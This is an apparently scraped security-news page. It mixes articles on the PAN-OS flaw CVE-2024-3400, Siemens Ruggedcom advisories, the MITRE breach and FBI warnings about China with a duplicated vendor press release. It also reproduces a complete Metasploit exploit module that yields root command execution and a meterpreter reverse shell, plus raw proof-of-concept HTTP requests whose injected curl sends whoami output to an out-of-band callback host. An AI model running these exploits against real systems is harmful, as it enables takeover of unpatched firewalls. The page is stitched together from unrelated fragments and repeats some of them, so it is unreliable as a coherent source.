Growing attacks targeting the flaw prompted CISA to include it in the known exploited vulnerabilities catalog earlier this month.

Source: HJBC via Shutterstock

Siemens is urging organizations using its Ruggedcom APE1808 devices configured with Palo Alto Networks (PAN) Virtual NGFW to implement workarounds for a maximum severity zero-day bug that PAN recently disclosed in its next-gen firewall product.

The command injection vulnerability, identified as CVE-2024-3400, affects multiple versions of PAN-OS firewalls when certain features are enabled on them. An attacker has been exploiting the flaw to deploy a novel Python backdoor on affected firewalls.

**Actively Exploited**

PAN patched the flaw after researchers from Volexity discovered the vulnerability and reported it to the security vendor earlier this month. The US Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2024-3400 to its catalog of known exploited vulnerabilities following reports of multiple groups attacking the flaw.

Palo Alto Networks itself has said it is aware of a growing number of attacks leveraging CVE-2024-3400 and has warned about proof-of-concept code for the flaw being publicly available.

According to Siemens, its Ruggedcom APE1808 product — commonly deployed as edge devices in industrial control environments — is vulnerable to the issue. Siemens described all versions of the product with PAN Virtual NGFW configured with the GlobalProtect gateway or GlobalProtect portal — or both — as affected by the vulnerability.

In an advisory, Siemens said it is working on updates for the bug and recommended specific countermeasures that customers should take in the meantime to mitigate risk. The measures include using specific threat IDs that PAN has released to block attacks targeting the vulnerability. Siemens' advisory pointed to PAN's recommendation to disable GlobalProtect gateway and GlobalProtect portal, and reminded customers that the features are already disabled by default in Ruggedcom APE1808 deployment environments.

PAN initially also recommended organizations disable device telemetry to protect against attacks targeting the flaw. The security vendor later withdrew that advice, citing ineffectiveness. "Device telemetry does not need to be enabled for PAN-OS firewalls to be exposed to attacks related to this vulnerability," the company noted.

Siemens urged customers, as a general rule, to protect network access to devices in industrial control environments with appropriate mechanisms, saying, "In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security."

The Shadowserver Foundation, which monitors the Internet for threat related traffic, identified some 5,850 vulnerable instances of PAN's NGFW exposed and accessible over the Internet as of April 22. Some 2,360 of the vulnerable instances appear to be located in North America; Asia accounted for the next highest number with around 1,800 exposed instances.

**Internet-Exposed Devices Remain a Critical Risk for ICS/OT**

It's unclear how many of those exposed instances are in industrial control system (ICS) and operational technology (OT) settings. But generally, Internet exposure continues to be a major issue in ICS and OT environments. A new investigation by Forescout uncovered nearly 110,000 Internet-facing ICS and OT systems worldwide. The US led the way, accounting for 27% of the exposed instances. However, that number was significantly lower compared with a few years ago. In contrast, Forescout found a sharp increase in the number of Internet-exposed ICS/OT equipment in other countries, including Spain, Italy, France, Germany, and Russia.

"Opportunistic attackers are increasingly abusing this exposure at scale — sometimes with a very lax targeting rationale driven by trends, such as current events, copycat behavior, or the emergencies found in new, off-the-shelf capabilities or hacking guides," Forescout said. The security vendor assessed that the exposure had to do at least in part with systems integrators delivering packaged bundles with components in them that inadvertently expose ICS and OT systems to the Internet. "In all likeliness," Forescout said, "most asset owners are unaware these packaged units contain exposed OT devices."

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Siemens Working on Fix for Device Affected by Palo Alto Firewall Bug

This Metasploit module exploits two vulnerabilities in Palo Alto Networks PAN-OS that allow an unauthenticated attacker to create arbitrarily named files and execute shell commands. Configuration requirements are PAN-OS with GlobalProtect Gateway or GlobalProtect Portal enabled and telemetry collection on (default). Multiple versions are affected. Payloads may take up to one hour to execute, depending on how often the telemetry service is set to run.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution',        'Description' => %q{          This module exploits two vulnerabilities in Palo Alto Networks PAN-OS that          allow an unauthenticated attacker to create arbitrarily named files and execute          shell commands. Configuration requirements are PAN-OS with GlobalProtect Gateway or          GlobalProtect Portal enabled and telemetry collection on (default). Affected versions          include < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1,          < 10.2.5-h6, < 10.2.6-h3, < 10.2.8-h3, and < 10.2.9-h1. Payloads may take up to          one hour to execute, depending on how often the telemetry service is set to run.        },        'License' => MSF_LICENSE,        'Author' => [          'remmons-r7', # Metasploit module          'sfewer-r7' # Metasploit module        ],        'References' => [          ['CVE', '2024-3400'], # At the time of announcement, both vulnerabilities were assigned one CVE identifier          ['URL', 'https://security.paloaltonetworks.com/CVE-2024-3400'], # Vendor Advisory          ['URL', 'https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/'], # Initial Volexity report of the 0day exploitation          ['URL', 'https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis'] # Rapid7 Analysis        ],        'DisclosureDate' => '2024-04-12',        'Platform' => [ 'linux', 'unix' ],        'Arch' => [ARCH_CMD],        'Privileged' => true, # Executes as root on Linux        'Targets' => [ [ 'Default', {} ] ],        'DefaultOptions' => {          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',          'FETCH_COMMAND' => 'WGET',          'RPORT' => 443,          'SSL' => true,          'FETCH_WRITABLE_DIR' => '/var/tmp',          'WfsDelay' => 3600 # 1h, since telemetry service cronjob can take up to an hour        },        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [            IOC_IN_LOGS,            # The /var/log/pan/gpsvc.log file will log an unmarshal failure message for every malformed session created            # The NGINX frontend web server, which proxies requests to the GlobalProtect service, will log client IPs in /var/log/nginx/sslvpn_access.log            # Similarly, the log file /var/log/pan/sslvpn-access/sslvpn-access.log will also contain a log of the HTTP requests            # The "device_telemetry_*.log" files in /var/log/pan will log the command being injected            ARTIFACTS_ON_DISK            # Several 0 length files are created in the following directories during checks and exploitation:            # - /opt/panlogs/tmp/device_telemetry/hour/            # - /opt/panlogs/tmp/device_telemetry/minute/            # - /var/appweb/sslvpndocs/global-protect/portal/fonts/          ]        }      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'An existing web application endpoint', '/global-protect/login.esp']),      ]    )  end  def check    # Try to create a new empty file in an accessible directory with the exploit primitive    # This file name was chosen because an extension in (css|js|eot|woff|woff2|ttf) is required for correct NGINX routing, and similarly named files already exist in the 'fonts' directory    file_check_name = "glyphicons-#{Rex::Text.rand_text_alpha_lower(8)}-regular.woff2"    touch_file("/var/appweb/sslvpndocs/global-protect/portal/fonts/#{file_check_name}")    # Access that file and a file that doesn't exist to confirm they return 403 and 404, respectively    res_check_created = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri('global-protect', 'portal', 'fonts', file_check_name)    )    return CheckCode::Unknown('Connection failed') unless res_check_created    res_check_not_created = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri('global-protect', 'portal', 'fonts', "X#{file_check_name}")    )    return CheckCode::Unknown('Connection failed') unless res_check_not_created    if (res_check_created.code != 403) || (res_check_not_created.code != 404)      return CheckCode::Safe('Arbitrary file write did not succeed')    end    CheckCode::Vulnerable("Arbitrary file write succeeded: /var/appweb/sslvpndocs/global-protect/portal/fonts/#{file_check_name} NOTE: This file will not be deleted")  end  def touch_file(file)    # Exploit primitive similar to `touch`, creating an empty file owned by root in the specified location    fail_with(Failure::BadConfig, 'Semicolon cannot be present in file name, due to the cookie injection context') if file.include? ';'    send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path),      'headers' => {        'Cookie' => "SESSID=./../../../..#{file}"      }    )  end  def exploit    # Encode the shell command payload as base64, then embed it in the appropriate exploitation context    # Since payloads cannot contain spaces, ${IFS} is used as a separator    cmd = "echo${IFS}-n${IFS}#{Rex::Text.encode_base64(payload.encoded)}|base64${IFS}-d|bash${IFS}-"    # Create maliciously named files in both telemetry directories that might be used by affected versions    # Both files are necessary, since it seems that some PAN-OS versions only execute payloads in 'hour' and others use 'minute'.    # It's possible that the payload will execute twice, but we've only observed one location working during testing    files = [      "/opt/panlogs/tmp/device_telemetry/hour/#{Rex::Text.rand_text_alpha_lower(4)}`#{cmd}`",      "/opt/panlogs/tmp/device_telemetry/minute/#{Rex::Text.rand_text_alpha_lower(4)}`#{cmd}`"    ]    files.each do |file_path|      vprint_status("Creating file at #{file_path}")      touch_file(file_path)      # Must register for clean up here instead of within touch_file, since touch_file is used in the check      register_file_for_cleanup(file_path)    end    print_status('Depending on the PAN-OS version, it may take the telemetry service up to one hour to execute the payload')    print_status('Though exploitation of the arbitrary file creation vulnerability succeeded, command injection will fail if the default telemetry service has been disabled')  endend

Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution

The irony is lost on few, as a nation-state threat actor used eight MITRE techniques to breach MITRE itself — including exploiting the Ivanti bugs that attackers have been swarming on for months.

Source: Kristoffer Tripplaar via Alamy Stock Photo

Foreign nation-state hackers have used vulnerable Ivanti edge devices to gain three months' worth of "deep" access to one of MITRE Corp.'s unclassified networks.

MITRE, steward of the ubiquitous ATT&CK glossary of commonly known cyberattack techniques, previously went 15 years without a major incident. The streak snapped in January when, like so many other organizations, its Ivanti gateway devices were exploited.

The breach affected the Networked Experimentation, Research, and Virtualization Environment (NERVE), an unclassified, collaborative network the organization uses for research, development, and prototyping. The extent of the NERVE damage (pun intended) is currently being assessed.

Dark Reading reached out to MITRE to confirm the timeline and details of the attack. MITRE did not provide further clarification.

**MITRE's ATT&CK**

Stop me if you've heard this one before: In January, after an initial reconnaissance period, a threat actor exploited one of the company's virtual private networks (VPNs) through two Ivanti Connect Secure zero-day vulnerabilities (ATT&CK technique T1190, Exploit Public-Facing Applications).

According to a blog post from MITRE's Center for Threat-Informed Defense, the attackers bypassed the multifactor authentication (MFA) protecting the system with some session hijacking (MITRE ATT&CK T1563, Remote Service Session Hijacking).

They attempted to leverage several different remote services (T1021, Remote Services), including the Remote Desktop Protocol (RDP) and Secure Shell (SSH), to gain access to a valid administrator account (T1078, Valid Accounts). With it, they pivoted and "dug deep" into the network's VMware virtualization infrastructure.

There, they deployed Web shells (T1505.003, Server Software Component: Web Shell) for persistence, and backdoors to run commands (T1059, Command and Scripting Interpreter) and steal credentials, exfiltrating any stolen data to a command-and-control server (T1041, Exfiltration Over C2 Channel). To hide this activity, the group created its own virtual instances to run within the environment (T1564.006, Hide Artifacts: Run Virtual Instance).

**MITRE's Defense**

"The impact of this cyberattack should not be taken lightly," says Darren Guccione, CEO and co-founder at Keeper Security, highlighting "both the foreign ties of the attackers and the ability of the attackers to exploit two serious zero-day vulnerabilities in their quest to compromise MITRE’s NERVE, which could potentially expose sensitive research data and intellectual property."

He posits, "Nation-state actors often have strategic motivations behind their cyber operations, and the targeting of a prominent research institution like MITRE, that works on behalf of the US government, could be just one component of a larger effort."

Whatever its goals were, the hackers had ample time to carry them out. Though the compromise occurred in January, MITRE was only able to detect it in April, leaving a quarter-year gap in between.

"MITRE followed best practices, vendor instructions, and the government’s advice to upgrade, replace, and harden our Ivanti system," the organization wrote on Medium, "but we did not detect the lateral movement into our VMware infrastructure. At the time we believed we took all the necessary actions to mitigate the vulnerability, but these actions were clearly insufficient."

Editor's note: An earlier version of the story attributed the attacks to UNC5221. That attribution has not been made at this time.

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

MITRE ATT&amp;CKED: InfoSec's Most Trusted Name Falls to Ivanti Bugs

The MITRE Corporation revealed that it was the target of a nation-state cyber attack that exploited two zero-day flaws in Ivanti Connect Secure appliances starting in January 2024.
The intrusion led to the compromise of its Networked Experimentation, Research, and Virtualization Environment (NERVE), an unclassified research and prototyping network.
The unknown adversary "performed reconnaissance

MITRE Corporation Breached by Nation-State Hackers Exploiting Ivanti Flaws

Users of the CrushFTP enterprise file transfer software are being urged to update to the latest version following the discovery of a security flaw that has come under targeted exploitation in the wild.
"CrushFTP v11 versions below 11.1 have a vulnerability where users can escape their VFS and download system files," CrushFTP said in an advisory released Friday.

Critical Update: CrushFTP Zero-Day Flaw Exploited in Targeted Attacks

Chinese actors are ready and poised to do "devastating" damage to key US infrastructure services if needed, he said.

Source: KaimDH via Shutterstock

FBI Director Christopher Wray this week delivered what might be the starkest warning yet on the threat that China-backed hackers pose to US national and economic security.

In remarks at a Vanderbilt University\-hosted summit on modern conflict and emerging threats, Wray described Chinese hackers as outnumbering FBI personnel by at least 50 to 1 and standing poised to "wreak havoc" on US critical infrastructure at a moment's notice.

**Immediate and Imminent Threat**

Stakeholders across private industry and government need to treat the threat as immediate and implement plans to fortify networks and respond to attacks now, the nation's leading law enforcement official said.

"The \[People's Republic of China\] has made it clear that it considers every sector that makes our society run as fair game in its bid to dominate on the world stage," Wray said. "Its plan is to land low blows against civilian infrastructure to try to induce panic and break America's will to resist."

Wray's comments build on repeated warnings in recent months from US officials — and the FBI itself — about a dangerous and systematic escalation in Chinese targeting of networks and systems belonging to organizations in critical infrastructure sectors. Wray and others have repeatedly described the intrusions as attempts by Chinese hackers to methodically pre-position themselves for attacks designed to disrupt telecommunications, energy, water, technology and other critical infrastructure services when needed.

China's cyberattackers are "giving the Chinese government the ability to wait for just the right moment to deal a devastating blow," Wray said. Beijing, he added, is building a capability to deter any US attempts to intervene in the event of a crisis between China and Taiwan.

**Multifaceted Attacks**

The ongoing attempts by Chinese hackers to establish and maintain a presence on critical infrastructure adds to the pressure that US organizations have had to deal with for more than a decade from China-backed cyber-espionage and cybercriminal groups. To support economic initiatives like Made in China 2025 and multiple separate five-year plans, Beijing has for years deployed cyber groups to systematically steal intellectual property and trade secrets from companies in key competitive sectors, Wray said.

Targets have included organizations in fields as diverse as biotech, aviation, artificial intelligence, agriculture, and healthcare. "The PRC is engaged in the largest and most sophisticated theft of intellectual property and expertise in the history of the world," Wray noted. "You could close your eyes and pull an industry or sector out of a hat and, chances are, Beijing has targeted it."

In recent months, the Volt Typhoon group has been one of the most visible faces of what the US regards as China's untrammeled aggression in cyberspace. The US Cybersecurity and Infrastructure Security Agency (CISA) and security vendors have, on multiple occasions this year, reported on the threat actor's intrusions into US critical infrastructure networks and operational technology environments with a view to gaining a presence on these networks and lying in wait for instructions to attack. Last year, The New York Times identified Volt Typhoon hitting military bases, prompting worried Biden administration officials to admit that the threat actor's malware was more endemic on US networks than previously thought.

**"Scattershot" and "Indiscriminate" Attacks**

Wray pointed to widespread attacks in 2021 that exploited zero-day vulnerabilities in Microsoft Exchange Server as one of the "most egregious examples" of China's "scattershot, indiscriminate, cyber campaigns," in recent memory. Those attacks involved China-backed Hafnium group deploying Web shells for remote access on thousands of corporate systems. The FBI — in an unprecedented move at the time — later obtained a court order to remotely remove those Web shells from thousands of infected systems before the threat actor could use them to inflict further damage.

In response to the growing threat, the FBI has mobilized its own field offices in the US and around the world to address the threat, Wray said. The agency is also working with US Cyber Command, the CIA, and foreign law enforcement agencies to disrupt Chinese hacking operations. The effort has included going after known hackers, malware developers, and the owners of support infrastructure like bulletproof hosting services and money launderers.

Private sector organizations can do their part by being more diligent about their cyber defense and response mechanisms and by sharing information that can prevent nascent threats from "metastasizing to other sectors" and businesses, Wray said. "We've seen the best outcomes in situations where a company made a habit of reaching out to their local FBI field office even before there was any indication of a problem, because that put everyone on the same page and contributed to the company's readiness."

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

FBI Director Wray Issues Dire Warning on China's Cybersecurity Threat

By Cyber Newswire
Zero Knowledge Networking vendor shrugs off firewall flaw!
This is a post from HackRead.com Read the original post: Xiid SealedTunnel: Unfazed by Yet Another Critical Firewall Vulnerability (CVE-2024-3400)

In the wake of the recent disclosure of a critical vulnerability (CVE-2024-3400) affecting a leading firewall solution, Xiid Corporation reminds organizations that Xiid SealedTunnel customers remain secure. This latest vulnerability, currently unpatched and rated 10/10 on the CVSS (Common Vulnerability Scoring System), highlights the limitations of traditional security approaches.

Xiid SealedTunnel, the world’s first and only Zero Knowledge Networking (ZKN) solution, goes beyond Zero Trust architecture. Unlike today’s firewalls susceptible to zero-day exploits because of their break-and-inspect approach and the inevitable use of “smart” detection techniques that can and do fail, SealedTunnel is inherently resilient by design.

“This is a great example of why complex firewalls become their own security risk. Keep your firewalls simple, and just have them block all inbound access,” said Josh Herr, Head of Deployment and Integration at Xiid Corp. “Xiid SealedTunnel takes a fundamentally different approach. Our ZKN architecture ensures that data remains completely private and never exposed, even in the face of unknown threats.”

Xiid’s ZKN technology leverages the power of Zero Knowledge Proofs, allowing users to verify access rights without ever revealing sensitive information. This eliminates attack surfaces and renders data unreadable to unauthorized parties, even if a network breach occurs.

****About Xiid Corporation****

Xiid Corporation is a leading cybersecurity provider specializing in Zero Knowledge Networking solutions. Xiid’s flagship product, SealedTunnel, empowers organizations to achieve unparalleled security and privacy through a revolutionary approach that goes beyond traditional firewalls and zero-trust models. www.xiid.com

**Contact**

**CEO**  
**Steve Visconti**  
**Xiid Corporation**  
**\[email protected\]**  
**7753382174**

Xiid SealedTunnel: Unfazed by Yet Another Critical Firewall Vulnerability (CVE-2024-3400)

By cybernewswire
Las Vegas, United States, April 17th, 2024, CyberNewsWire Zero Knowledge Networking vendor shrugs off firewall flaw In the…
This is a post from HackRead.com Read the original post: Xiid SealedTunnel: Unfazed by Yet Another Critical Firewall Vulnerability (CVE-2024-3400)

**Las Vegas, United States, April 17th, 2024, CyberNewsWire**

****Zero Knowledge Networking vendor shrugs off firewall flaw****

In the wake of the recent disclosure of a critical vulnerability (CVE-2024-3400) affecting a leading firewall solution, Xiid Corporation reminds organizations that Xiid SealedTunnel customers remain secure. This latest vulnerability, currently unpatched and rated 10/10 on the CVSS (Common Vulnerability Scoring System), highlights the limitations of traditional security approaches.

Xiid SealedTunnel, the world’s first and only Zero Knowledge Networking (ZKN) solution, goes beyond Zero Trust architecture. Unlike today’s firewalls susceptible to zero-day exploits because of their break-and-inspect approach and the inevitable use of “smart” detection techniques that can and do fail, SealedTunnel is inherently resilient by design.

“This is a great example of why complex firewalls become their own security risk. Keep your firewalls simple, and just have them block all inbound access,” said Josh Herr, Head of Deployment and Integration at Xiid Corp. “Xiid SealedTunnel takes a fundamentally different approach. Our ZKN architecture ensures that data remains completely private and never exposed, even in the face of unknown threats.”

Xiid’s ZKN technology leverages the power of Zero Knowledge Proofs, allowing users to verify access rights without ever revealing sensitive information. This eliminates attack surfaces and renders data unreadable to unauthorized parties, even if a network breach occurs.

**About Xiid Corporation**

Xiid Corporation is a leading cybersecurity provider specializing in Zero Knowledge Networking solutions. Xiid’s flagship product, SealedTunnel, empowers organizations to achieve unparalleled security and privacy through a revolutionary approach that goes beyond traditional firewalls and zero-trust models. www.xiid.com

**Contact**

**CEO**  
**Steve Visconti**  
**Xiid Corporation**  
**\[email protected\]**  
**7753382174**

Palo Alto OS was recently hit by a command injection zero day attack. These are exploitation details related to the zero day.

# CVE-2024-3400

CVE-2024-3400 Palo Alto OS Command Injection

send this HTTP request: 

```http

POST /ssl-vpn/hipreport.esp HTTP/1.1  
Host: 127.0.0.1  
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 0  
```

![image](https://github.com/h4x0r-dz/CVE-2024-3400/assets/26070859/96803de5-1d8c-42ec-b1fc-60e8e4a0a954)

you will create hellome1337.txt file on the server with root access 

now if you try to access the files you should receive 403 insted of 404

![image](https://github.com/h4x0r-dz/CVE-2024-3400/assets/26070859/e579d4a6-11a5-4f7c-a3da-ba7b0cfa8a4d)

### Command Injection

```  
POST /ssl-vpn/hipreport.esp HTTP/1.1  
Host: 127.0.01  
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 0

```

More Info :   
https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis  
https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/

Palo Alto OS Command Injection

This is a scanning script to validate vulnerable Palo Alto OS systems for the recent zero day command injection vulnerability.

Tag

#zero_day